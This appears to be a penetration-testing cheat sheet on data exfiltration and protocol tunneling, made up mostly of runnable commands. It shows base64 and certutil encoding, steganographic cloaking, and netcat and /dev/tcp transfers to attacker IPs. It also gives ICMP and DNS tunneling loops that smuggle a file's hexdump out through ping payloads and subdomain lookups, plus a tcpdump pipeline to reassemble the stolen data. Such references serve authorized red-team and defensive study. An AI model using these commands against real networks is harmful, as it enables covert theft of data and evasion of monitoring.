Data Exfiltration and Protocol Tunneling

Exfiltration

At a Glance

Data exfiltration, also called data extrusion or data exportation, is the unauthorized transfer of data from a device or network.1

Encoding

Base64

Linux encoding/decoding.

cat filename.ext | base64 -w0
cat filename.ext | base64 -d
Parameters
  • -w<col>: wrap encoded lines after <col> character (default 76).
  • -d: decode data.

Windows encoding/decoding.

certutil -encode filename.ext output.ext
certutil -decode filename.ext output.ext

Steganography

Cloakify 2

python ./cloakify.py filename.ext ./ciphers/topWebsites

Alternatively:

python ./cloakifyFactory

File Transfer

wget (recursive)

wget -r 10.0.0.3:1234
Parameters
  • -r: Specify recursive download.

curl

curl 10.0.0.3/filename.ext -o filename.ext
Parameters
  • -o <file>: Write to <file> instead of stdout.

scp

scp user@10.0.0.3:/filename.ext .

nc

# Receiver
nc -nvlp 1234 > filename.ext
# Sender
nc -nv 10.0.0.1 1234 < filename.ext
Parameters
  • n: don’t do DNS lookups.
  • v: prints status messages.
  • l: listen.
  • p <port>: local port used for listening.

/dev/tcp 3

# Receiver
nc -nvlp 1234 > filename.ext
# Sender
cat filename.ext > /dev/tcp/10.0.0.1/1234
# Sender
nc -w5 -nvlp 1234 < filename.ext
# Receiver
exec 6< /dev/tcp/10.0.0.1/1234
cat <&6 > filename.ext

Web Servers

Python

python -m SimpleHTTPServer 1234
python3 -m http.server 1234

Simple HTTP Server with File Upload

Ruby

ruby -run -e httpd . -p1234
ruby -r webrick -e 'WEBrick::HTTPServer.new(:Port => 1234, :DocumentRoot => Dir.pwd).start'

Perl

perl -MHTTP::Daemon -e '$d = HTTP::Daemon->new(LocalPort => 1234) or  +die $!; while($c = $d->accept){while($r = $c->get_request){+$c->send_file_response(".".$r->url->path)}}'

Note: Install HTTP:Daemon if not present with: sudo cpan HTTP::Daemon

PHP

php -S 127.0.0.1:1234

NodeJS

http-server

npm install -g http-server
http-server -p 1234

node-static

npm install -g node-static
static -p 1234

FTP Servers

Python

pip install pyftpdlib
python3 -m pyftpdlib -p 1234

NodeJS

npm install -g ftp-srv
ftp-srv ftp://0.0.0.0:1234 --root ./

Tunneling

ICMP

Capture ICMP packets with the following script:

Generate ICMP packets from the file hexdump.

xxd -p -c 8 filename.ext | while read h; do ping -c 1 -p $h 10.0.0.3; done
Parameters

xxd:

  • -p: Output in postscript continuous hexdump style. Also known as plain hexdump style.
  • -c <cols>: Format <cols> octets per line.

ping:

  • -c <count>: Stop after sending <count> ECHO_REQUEST packets.
  • -p: You may specify up to 16 “pad” bytes to fill out the packet you send.

Note: Match xxd columns (-c 8) with the data sliced (packet[ICMP].load[-8:]) in the script.

DNS

Capture DNS packets data.

sudo tcpdump -n -i wlan0 -w dns_exfil.pcap udp and src 10.0.0.3 and port 53

Note: Remember to point the DNS resolution to where packages are being captured.

Generate DNS queries.

xxd -p -c 16 filename.ext | while read h; do ping -c 1 ${h}.domain.com; done

Extract exfiltrated data.

tcpdump -r dns-exfil.pcap 2>/dev/null | sed -e 's/.*\ \([A-Za-z0-9+/]*\).domain.com.*/\1/' | uniq | paste -sd "" - | xxd -r -p

PacketWhisper 4

Capture packages with tcpdump, as described above. Cloak, exfiltrate and decloak from the cli.

sudo packetWhisper.py

Further Reading


  1. “Exfiltration, Tactic TA0010 - Enterprise.” MITRE ATT&CK®, https://attack.mitre.org/tactics/TA0010/. ↩︎

  2. TryCatchHCF. “TryCatchHCF/Cloakify: CloakifyFactory.” GitHub, https://github.com/TryCatchHCF/Cloakify. ↩︎

  3. “/Dev.” The Linux Documentation Project, https://tldp.org/LDP/abs/html/devref1.html. ↩︎

  4. TryCatchHCF. “PacketWhisper.” GitHub, https://github.com/TryCatchHCF/PacketWhisper. ↩︎